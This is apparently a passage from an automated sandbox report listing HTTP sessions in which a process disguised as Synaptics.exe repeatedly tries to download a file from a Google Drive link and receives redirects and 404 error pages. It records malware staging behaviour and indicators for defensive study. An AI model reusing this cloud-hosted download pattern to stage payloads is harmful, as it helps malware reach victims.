                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        138192.168.2.750183142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:49 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:49 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6ge6UBvu9uZiZtdxmI0-pNOO5HjFXlfEMJrSSmSIflKgJBAcqVwocIJKE61nno-c_UUtT2Ygg
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:49 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dBZO0BNDW_1v7pqPQxbUGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:49 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:49 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 72 58 61 78 71 2d 56 47 6f 70 64 66 73 66 71 52 50 30 5a 66 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="5rXaxq-VGopdfsfqRP0Zfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:49 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        139192.168.2.750184142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:49 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:49 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-xbn4x94tIGzxe98loOVUyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        140192.168.2.750185142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:49 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:49 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6lTGIW5_v_Ad-GPfsTluD8HOmb7ZQvVwDDb_wkXivZ3IlM6PwMNeX0L9IwVtXWPzFH
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:49 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-jH3QNddspFNMkjNbVxAx7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:49 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:49 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 71 6c 2d 6a 54 45 4d 53 71 38 66 49 4d 6f 61 52 75 49 50 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="-ql-jTEMSq8fIMoaRuIPAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:49 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        141192.168.2.750186142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:49 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:49 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_KuP9IWtt1ATmvxUQkIrcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        142192.168.2.750187142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:50 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:50 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-iYDP50rim0Lxcc6Sl97yCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        143192.168.2.750188142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:50 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:50 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7RsI4IkVDAWhw9X3YB-4sRiYsdjXMJMC-WUbQI93dliba3ysV-qYaK5pyfAwJls7fR
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:50 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DGA-k_GhwQlVtb6IjSbW0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:50 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:50 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 46 35 4f 79 56 6a 2d 33 43 49 5f 6d 79 4d 7a 37 6b 78 6b 39 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="AF5OyVj-3CI_myMz7kxk9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:50 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        144192.168.2.750189142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:50 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:50 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-jqSmsyjBitq3sNfzhdNdfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
